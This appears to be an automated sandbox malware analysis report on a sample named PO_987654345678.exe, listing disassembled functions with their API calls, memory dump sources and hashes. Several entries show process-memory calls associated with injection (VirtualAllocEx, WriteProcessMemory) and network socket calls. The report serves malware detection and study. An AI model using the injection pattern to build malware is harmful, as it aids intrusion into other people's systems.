                          • API ID: PerformanceQuery$CounterSleep$Frequency
                          • String ID:
                          • API String ID: 2833360925-0
                          • Opcode ID: 18833738d564903b0d9a1f682952bbccaa57d86457227e141ed49f6969d6042e
                          • Instruction ID: 0ac96565eb5ff840c8c9a6e24a8999d161f8359b87740e2f61bc8a4d5b9466d7
                          • Opcode Fuzzy Hash: 18833738d564903b0d9a1f682952bbccaa57d86457227e141ed49f6969d6042e
                          • Instruction Fuzzy Hash: 17015336C0162DDBCF00AFE5DC59AEEBB78BF08710F000556E902B3241CB309690ABA6
                          Function 00F610F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F61114
                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,00F60B9B,?,?,?), ref: 00F61120
                          • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F60B9B,?,?,?), ref: 00F6112F
                          • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F60B9B,?,?,?), ref: 00F61136
                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F6114D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                          • String ID:
                          • API String ID: 842720411-0
                          • Opcode ID: 61ef83139bf3c47cfa9e44531f5f997dc883843166e0beca39e98f3a21de35d1
                          • Instruction ID: 5fe07b01aacd37d3d56d87659322eb5d724f8d6abbb4fd9dbaf394c7a08313d7
                          • Opcode Fuzzy Hash: 61ef83139bf3c47cfa9e44531f5f997dc883843166e0beca39e98f3a21de35d1
                          • Instruction Fuzzy Hash: FD013175500209BFDB114FA5DC49E6A3F6EFF86360B554416FA45D7360DB31DC40AEA0
                          Function 00F60FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F60FCA
                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F60FD6
                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F60FE5
                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F60FEC
                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F61002
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocErrorLastProcess
                          • String ID:
                          • API String ID: 44706859-0
                          • Opcode ID: bda8be50d32f80ab5c10b1d25f208217cd4a3ab5d489eba414bdf508acf7e264
                          • Instruction ID: ac43708fd74358e9ccb92eed9e03927f57b8b98770c384593dbcee6ef95d3304
                          • Opcode Fuzzy Hash: bda8be50d32f80ab5c10b1d25f208217cd4a3ab5d489eba414bdf508acf7e264
                          • Instruction Fuzzy Hash: 3BF04935600309BBDB214FA59C49F5A3BADFF89762F644416FA49C6261CA70DC80AAB0
                          Function 00F61014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F6102A
                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F61036
                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F61045
                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F6104C
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F61062
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocErrorLastProcess
                          • String ID:
                          • API String ID: 44706859-0
                          • Opcode ID: 4fbc2aff57fd9e1385362ea0b66dce86e21a818b27d1583a168795299256e8fd
                          • Instruction ID: 3200816a28f763d769cc446b5f439ee960fb8ae3bb6e7dd70e5cbda6431e6d20
                          • Opcode Fuzzy Hash: 4fbc2aff57fd9e1385362ea0b66dce86e21a818b27d1583a168795299256e8fd
                          • Instruction Fuzzy Hash: 4CF06D35600319FBDB215FA5EC49F5A3BADFF89761F240416FA45C7261CA70D880AAB0
                          Function 00F7030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                          Download Yara Rule
                          APIs
                          • CloseHandle.KERNEL32(?,?,?,?,00F7017D,?,00F732FC,?,00000001,00F42592,?), ref: 00F70324
                          • CloseHandle.KERNEL32(?,?,?,?,00F7017D,?,00F732FC,?,00000001,00F42592,?), ref: 00F70331
                          • CloseHandle.KERNEL32(?,?,?,?,00F7017D,?,00F732FC,?,00000001,00F42592,?), ref: 00F7033E
                          • CloseHandle.KERNEL32(?,?,?,?,00F7017D,?,00F732FC,?,00000001,00F42592,?), ref: 00F7034B
                          • CloseHandle.KERNEL32(?,?,?,?,00F7017D,?,00F732FC,?,00000001,00F42592,?), ref: 00F70358
                          • CloseHandle.KERNEL32(?,?,?,?,00F7017D,?,00F732FC,?,00000001,00F42592,?), ref: 00F70365
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID:
                          • API String ID: 2962429428-0
                          • Opcode ID: 91dacb946deb6feb227caa339527e20829f91ef2a9a5600f471baa5ddde8180f
                          • Instruction ID: ac4a3b62933e60f4dda72057f692c51eabf2354f843ab26be1618f3416875c1b
                          • Opcode Fuzzy Hash: 91dacb946deb6feb227caa339527e20829f91ef2a9a5600f471baa5ddde8180f
                          • Instruction Fuzzy Hash: ED019072800B15DFC7309F66D880812F7F5BE502253158A3FD19A52931C771A954EE81
                          Function 00F3D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 00F3D752
                            • Part of subcall function 00F329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000), ref: 00F329DE
                            • Part of subcall function 00F329C8: GetLastError.KERNEL32(00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000,00000000), ref: 00F329F0
                          • _free.LIBCMT ref: 00F3D764
                          • _free.LIBCMT ref: 00F3D776
                          • _free.LIBCMT ref: 00F3D788
                          • _free.LIBCMT ref: 00F3D79A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 24dbda3e741235e269bfc7e0564d17614ef2753d02cd386f63acbccf53a68932
                          • Instruction ID: 927ff1f41e7ed17cafe294e2708c2c58320b4eff01b4944c580383c1411ed318
                          • Opcode Fuzzy Hash: 24dbda3e741235e269bfc7e0564d17614ef2753d02cd386f63acbccf53a68932
                          • Instruction Fuzzy Hash: 9CF01272945218AB8665EB68FEC6D1A7BEDBB44730F940845F048D7541C734FC80B6A4
                          Function 00F65C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 00F65C58
                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F65C6F
                          • MessageBeep.USER32(00000000), ref: 00F65C87
                          • KillTimer.USER32(?,0000040A), ref: 00F65CA3
                          • EndDialog.USER32(?,00000001), ref: 00F65CBD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                          • String ID:
                          • API String ID: 3741023627-0
                          • Opcode ID: 6a19f108ceff3963bd3b1bb865e018191342d5593d44a3130da94bbed1796e39
                          • Instruction ID: 4f61968e40ad0d69561d008edb557473bc1b5a73b6bdf22ba9daca7462b3bd89
                          • Opcode Fuzzy Hash: 6a19f108ceff3963bd3b1bb865e018191342d5593d44a3130da94bbed1796e39
                          • Instruction Fuzzy Hash: C1018171500B08AFEB305B60ED4EFA67BB8BB00F05F00055AA587B10E1DBF4A984AB90
                          Function 00F322A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 00F322BE
                            • Part of subcall function 00F329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000), ref: 00F329DE
                            • Part of subcall function 00F329C8: GetLastError.KERNEL32(00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000,00000000), ref: 00F329F0
                          • _free.LIBCMT ref: 00F322D0
                          • _free.LIBCMT ref: 00F322E3
                          • _free.LIBCMT ref: 00F322F4
                          • _free.LIBCMT ref: 00F32305
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 3c2dee3f0999b87c5644d536195eed8f8921b79036a22e1a2fdec2d9ea5c389b
                          • Instruction ID: 20ca3956d30c8f6c3e1b263c3a575f290c2c440248059f08cf4c4817663c5d13
                          • Opcode Fuzzy Hash: 3c2dee3f0999b87c5644d536195eed8f8921b79036a22e1a2fdec2d9ea5c389b
                          • Instruction Fuzzy Hash: CAF0DA758031389B8652AF78BD02A4E3B66F718771F15064BF414D72B1CB364952BBE4
                          Function 00F195C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                          Download Yara Rule
                          APIs
                          • EndPath.GDI32(?), ref: 00F195D4
                          • StrokeAndFillPath.GDI32(?,?,00F571F7,00000000,?,?,?), ref: 00F195F0
                          • SelectObject.GDI32(?,00000000), ref: 00F19603
                          • DeleteObject.GDI32 ref: 00F19616
                          • StrokePath.GDI32(?), ref: 00F19631
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Path$ObjectStroke$DeleteFillSelect
                          • String ID:
                          • API String ID: 2625713937-0
                          • Opcode ID: db9811dd5bb11e15802bd08a336c9b3bf7846168dfb828f8afd506e422c20daf
                          • Instruction ID: f1afaabff416511f79b00a35a61e5319191286c60e4cc85892ff2c81f0be6526
                          • Opcode Fuzzy Hash: db9811dd5bb11e15802bd08a336c9b3bf7846168dfb828f8afd506e422c20daf
                          • Instruction Fuzzy Hash: 7BF0193140A20CEBDB165F75ED287A43B62BB00332F048216F525950F1CB708995FFA5
                          Function 00F30F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: __freea$_free
                          • String ID: a/p$am/pm
                          • API String ID: 3432400110-3206640213
                          • Opcode ID: 30be6012c5a1334fbb464f98402d39db1a624a2fabde5d4a122be8765e1514a5
                          • Instruction ID: 22a54e21552f21530a6d80b49ed6cfc0668a1306466215896fe8389ad97686b2
                          • Opcode Fuzzy Hash: 30be6012c5a1334fbb464f98402d39db1a624a2fabde5d4a122be8765e1514a5
                          • Instruction Fuzzy Hash: 1DD12472D00206CADB289F68C895BFEB7B4FF06330F284159E901AB651D7759D80FBA1
                          Function 00F87B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F20242: EnterCriticalSection.KERNEL32(00FD070C,00FD1884,?,?,00F1198B,00FD2518,?,?,?,00F012F9,00000000), ref: 00F2024D
                            • Part of subcall function 00F20242: LeaveCriticalSection.KERNEL32(00FD070C,?,00F1198B,00FD2518,?,?,?,00F012F9,00000000), ref: 00F2028A
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                            • Part of subcall function 00F200A3: __onexit.LIBCMT ref: 00F200A9
                          • __Init_thread_footer.LIBCMT ref: 00F87BFB
                            • Part of subcall function 00F201F8: EnterCriticalSection.KERNEL32(00FD070C,?,?,00F18747,00FD2514), ref: 00F20202
                            • Part of subcall function 00F201F8: LeaveCriticalSection.KERNEL32(00FD070C,?,00F18747,00FD2514), ref: 00F20235
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                          • String ID: 5$G$Variable must be of type 'Object'.
                          • API String ID: 535116098-3733170431
                          • Opcode ID: 50c7b220732622f72866296ffb05f46c3f7bbaf0413f6ce8038e4899c3e28dd4
                          • Instruction ID: 83d4c9cf25fedb13db23fec01e687c167fe92fd24154d041a0624f6ea0d30026
                          • Opcode Fuzzy Hash: 50c7b220732622f72866296ffb05f46c3f7bbaf0413f6ce8038e4899c3e28dd4
                          • Instruction Fuzzy Hash: 8E917A71A04209EFCB04FF54D891AEDB7B2BF45314F248059F806AB292DB75EE41EB51
                          Function 00F62716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F6B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F621D0,?,?,00000034,00000800,?,00000034), ref: 00F6B42D
                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F62760
                            • Part of subcall function 00F6B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F621FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00F6B3F8
                            • Part of subcall function 00F6B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00F6B355
                            • Part of subcall function 00F6B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F62194,00000034,?,?,00001004,00000000,00000000), ref: 00F6B365
                            • Part of subcall function 00F6B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F62194,00000034,?,?,00001004,00000000,00000000), ref: 00F6B37B
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F627CD
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F6281A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                          • String ID: @
                          • API String ID: 4150878124-2766056989
                          • Opcode ID: f9f508d9ea66f83e46553f62d2a6af35f92f11064eec82f887f269a0eedc4b80
                          • Instruction ID: 8792a18aafaa6ddc1d886cf4be2b4f5f91a8c2c80157cf4b74cbd8f44134e59f
                          • Opcode Fuzzy Hash: f9f508d9ea66f83e46553f62d2a6af35f92f11064eec82f887f269a0eedc4b80
                          • Instruction Fuzzy Hash: 51411C72900218AFDB10DFA4CD46EEEBBB8AF09710F108055FA55B7181DB746E85DBA1
                          Function 00F3172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO_987654345678.exe,00000104), ref: 00F31769
                          • _free.LIBCMT ref: 00F31834
                          • _free.LIBCMT ref: 00F3183E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _free$FileModuleName
                          • String ID: C:\Users\user\Desktop\PO_987654345678.exe
                          • API String ID: 2506810119-2142151873
                          • Opcode ID: 02497e843fa84de144db822f97236c8b141230a91e616462b90e3f085af93a64
                          • Instruction ID: 469ff36d217a5b174d9304c5bcd9dfcccb38016b7abb241dcb9c84015d8b1e75
                          • Opcode Fuzzy Hash: 02497e843fa84de144db822f97236c8b141230a91e616462b90e3f085af93a64
                          • Instruction Fuzzy Hash: 1B316D75E01218BBDB21DB999C85D9EBBBCFB85330F1441A7E80497211D6758A40EBA4
                          Function 00F6C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F6C306
                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00F6C34C
                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FD1990,01245730), ref: 00F6C395
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Menu$Delete$InfoItem
                          • String ID: 0
                          • API String ID: 135850232-4108050209
                          • Opcode ID: bf8b3439376d006fa71959973bd7ec2af2f17adf0d5d2f251ab2f052c9f8dfcd
                          • Instruction ID: ca874179619b8d068dba15f64ac03959d528e808be5b33c69fbf201279a266a2
                          • Opcode Fuzzy Hash: bf8b3439376d006fa71959973bd7ec2af2f17adf0d5d2f251ab2f052c9f8dfcd
                          • Instruction Fuzzy Hash: 0B418F316043019FD720DF25DC45B6ABBE8AB85320F14861EF9E5973D1D774E904EBA2
                          Function 00F94416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                          Download Yara Rule
                          APIs
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F9CC08,00000000,?,?,?,?), ref: 00F944AA
                          • GetWindowLongW.USER32 ref: 00F944C7
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F944D7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$Long
                          • String ID: SysTreeView32
                          • API String ID: 847901565-1698111956
                          • Opcode ID: f5c2d0c821756f25d356042c4b42375ecdebdd6fb63458226ae0c9b713fcb4a5
                          • Instruction ID: 99c0cc7faf9d1260b871b8c9897e6c81336edcf69790788e98b61c3be7a0d9a9
                          • Opcode Fuzzy Hash: f5c2d0c821756f25d356042c4b42375ecdebdd6fb63458226ae0c9b713fcb4a5
                          • Instruction Fuzzy Hash: 1C319C32610209ABEF208F78DC45FEA7BA9EB18334F254715F979921D0D774EC51AB90
                          Function 00F8304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F8335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00F83077,?,?), ref: 00F83378
                          • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F8307A
                          • _wcslen.LIBCMT ref: 00F8309B
                          • htons.WSOCK32(00000000,?,?,00000000), ref: 00F83106
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
